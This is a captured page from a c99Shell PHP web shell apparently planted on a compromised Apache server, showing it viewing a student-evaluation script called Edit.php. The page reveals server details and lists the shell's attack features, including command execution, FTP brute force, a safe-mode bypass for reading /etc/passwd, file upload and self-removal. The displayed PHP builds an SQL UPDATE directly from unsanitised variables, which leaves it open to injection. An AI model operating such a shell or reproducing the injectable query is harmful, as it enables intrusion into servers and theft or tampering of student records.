!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/manage/Std_Acc_depart/Student/PI12/   drwxr-xr-x
Free 50.9 GB of 127.8 GB (39.83%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     Edit.php (1.25 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
    
include("../../../include/FunctionDB.php");
    
ConnectDB();            

//Code  Term  Course_code  Series  x1  x2  x3  x4  x5  x6  x7  x8  x9  x10  x11  x12  x13  sd1  sd2  sd3  sd4  sd5  sd6  sd7  sd8  sd9  sd10  sd11  sd12  sd13  rate1  rate2  rate3  rate4  rate5  rate6  rate7  rate8  rate9  rate10  rate11  rate12  rate13  
$sql "UPDATE std_employer_tb SET Term='$Term',Course_code='$Course_code',Series='$Series',x1='$x1',x2='$x2',x3='$x3',x4='$x4',x5='$x5',x6='$x6',x7='$x7',x8='$x8',x9='$x9',x10='$x10',x11='$x11',x12='$x12',x13='$x13',sd1='$sd1',sd2='$sd2',sd3='$sd3',sd4='$sd4',sd5='$sd5',sd6='$sd6',sd7='$sd7',sd8='$sd8',sd9='$sd9',sd10='$sd10',sd11='$sd11',sd12='$sd12',sd13='$sd13',rate1='$rate1',rate2='$rate2',rate3='$rate3',rate4='$rate4',rate5='$rate5',rate6='$rate6',rate7='$rate7',rate8='$rate8',rate9='$rate9',rate10='$rate10',rate11='$rate10',rate11='$rate11',rate12='$rate12',rate13='$rate13'  Where Code ='$Code' ";
$result mysql_query($sql) or die("Update Error $sql".mysql_error());
  
// echo"<center><font face=\"Tahoma\"size=\"6\" color=\"#FF0000\">Update Complete</font></center>";
//  echo"<meta http-equiv=\"refresh\" content=\"1;URL=ShowStdSucc.php?Student_id=$Student_id\">";
    
header("Location:EditList.php");                
        
CloseDB();
?>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0103 ]--